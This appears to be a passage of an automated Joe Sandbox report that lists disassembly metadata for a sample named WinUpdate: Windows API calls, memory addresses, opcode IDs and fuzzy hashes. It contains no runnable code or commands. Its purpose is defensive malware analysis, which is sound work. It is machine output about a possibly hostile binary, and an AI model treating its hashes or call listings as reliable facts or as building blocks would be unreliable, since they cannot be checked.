                                                                                                                                                                                                                                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: malloc
                                                                                                                                                                                                                                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                                                                                • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                                                                                • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                                                                                                • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memcmpmemset
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1065087418-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1381354015-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1297977491-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                                                                                                • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                                                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2154303073-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3150196962-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                                                                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$PointerRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3154509469-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4232544981-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3859505661-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                                                                                                                                                                • String ID:
